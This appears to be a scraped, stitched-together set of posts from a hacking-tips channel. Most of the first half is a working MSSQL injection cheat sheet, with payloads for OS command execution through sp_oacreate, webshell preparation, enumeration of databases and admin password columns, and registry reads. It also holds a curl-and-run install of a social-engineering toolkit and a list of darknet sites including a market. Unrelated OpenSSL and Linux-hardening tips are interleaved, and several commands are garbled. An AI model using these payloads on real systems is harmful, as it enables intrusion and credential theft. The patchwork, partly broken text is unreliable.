;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c：\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e：\"'--
Access attributes: (cooperate with writing a webshell)

11) declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL,' cscript.exe c：\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse'
Explosive library Special skills: %5c='\' or submit / and \ modify %5
and 0<>(select top 1 paths from newtable)--

12) Get the library name (from 1 to 5 are the system id, 6 or more can be judged)
and 1=(select name from master.dbo.sysdatabases where dbid=7)--
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
Submit dbid = 7, 8, 9.... to get more database names

and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U') admin
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('Admin')) 来得到其他的表。
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin'
and uid>(str(id))) UID18779569 uid=id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) admin一user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
('id',...)
and 0<(select user_id from BBS.dbo.admin where username>1) 可
You can get the password in turn. . . . . Suppose there are fields such as user_id username and password

and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U')
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in('Address'))
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))
and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794)
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union，access)

13)Get the WEB path
;create table [dbo].[swap] ([swappass][char](255));--
and (select top 1 swappass from swap)=1--
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', values=@test OUTPUT insert into paths(path) values(@test)--
;use ku1;--
;create table cmd (str image);-- image—cmd


Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑FOR EXPERTS ASP+PHP standard SQL injection statement:

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to install the most recent version of OpenSSL on Windows 10 :

Take OpenSSL for example.

This open source cryptographic library that implements the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols is designed to “protect communications over computer networks from eavesdropping,” but guess what?

2) From the very beginning, it was riddled with mistakes.

This can be inevitable, to a certain extent - after all, we're talking about software.

While there is nothing you can do about bugs that have yet to be identified, you can at least protect your systems from bugs that are already fixed and documented.

It's a shame that the official OpenSSL site only offers Linux source.

While Linux distributions usually ship with OpenSSL, this does not apply to Windows ... or, say, "Windows distributions".

If you want to run it, you need a Windows binary, and if you don't want to build it yourself, you must find another option.

1) Step 1. Download the binary
Finding OpenSSL binaries for Windows is no easy task, but don't despair.

They exist.

2) To download the required one, follow the link:

https://slproweb.com/products/Win32OpenSSL.html

Don't be fooled by either the Win32 string in the URL or the navigation pointing to a seemingly ancient download page from back in 2004.

3) Scroll down to the Download Win32 OpenSSL section.

Now you need to select the correct file from this list.

4) There are two main types for each version: light and full.

5) Download a file called "Win64 OpenSSL v1.1.0f" (or a newer version as soon as it becomes available) to download the full installer.

6) Step 2. Run the installer
We recommend installing OpenSSL outside of your Windows system directory.

Follow the GUI installation instructions.

7) Step 3. Run the OpenSSL binary
To get started with OpenSSL, you can simply right click on it in Windows Explorer at its installation location, like in my case:

C: \ OpenSSL-Win64 \ bin \
then select "Run as administrator".

8) You can now start generating OpenSSL keys. (By the way, users of the PuTTY remote access utility can export the OpenSSH key from PuTTYgen.)

9) When using OpenSSL on Windows this way, you simply skip the openssl command you see at the prompt.
For example, to create a key pair using OpenSSL on Windows, you can enter:

10) openssl req -newkey rsa: 2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
and follow the onscreen instructions as usual.

11) To view the certificate:
openssl x509 -text -noout -in certificate.pem
Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

For example, create a new udev configuration file named 80-readonly-usb.rules in the /etc/udev/rules.d/ directory with the following content:

SUBSYSTEM == "block", ATTRS {removable} == "1", RUN {program} = "/ sbin / blockdev --setro% N"
Then apply the rule with the following command:

# udevadm control -reload

12) Disable TTY root access
To prevent the root account from logging in through all console devices (TTY), delete the contents of the securetty file by typing the following command at a command prompt as root.

# cp / etc / securetty /etc/securetty.bak
# cat / dev / null> / etc / securetty
Remember this rule does not apply to SSH login

To prevent logging in via SSH, edit the / etc / ssh / sshd_config file and add the following line:

PermitRootLogin no

13) Use POSIX ACL to extend system rights
Access Control Lists (ACLs) can define access rights for more than one user or group, and can define rights for programs, processes, files, and directories.

If you set an ACL for a directory, its child directories will automatically inherit the same rights.

For instance:

# setfacl -mu: user: rw file
# getfacl file


Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to install the most recent version of OpenSSL on Windows 10 ?

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑no root Social Engineering Toolkit on Termux
#FastTips

1) pkg update && pkg upgrade -y

2) apt install curl -y

3) curl -LO https://raw.githubusercontent.com/Hax4us/setoolkit/master/setoolkit.sh

4) sh setoolkit.sh

5) After finishing the above process type the following command

6) cd setoolkit

7) ./setup.py install

8) ./setoolkit

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑DarkNet SITES 24/24 —- 7/24

https://onion.cab - clearnet (!) onion.cab, view hidden onion sites without Tor;

http://facebookcorewwwi.onion - Facebook, the same one));

http://sms4tor3vcr2geip.onion - SMS4TOR, a self-destruct message service;

http://oi4bvjslpt5gabjq.onion - République de Hackers, another French-language hacker forum;

http://pwoah7foa6au2pul.onion - Alphabay market;

http://mail2tor2zyjdctd.onion - Mail2Tor, e-mail service;

http://torbox3uiot6wchz.onion - TorBox, e-mail service inside .onion;

http://zw3crggtadila2sg.onion/imageboard - TorChan, "Tor's # 1 imageboard";

http://cyjabr4pfzupo7pg.onion - CYRUSERV, a jabber service from CYRUSERV;

http://rutorc6mqdinc4cz.onion - RuTor.org, a well-known torrent tracker;

http://flibustahezeous3.onion is the famous onion-style electronic library.


Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁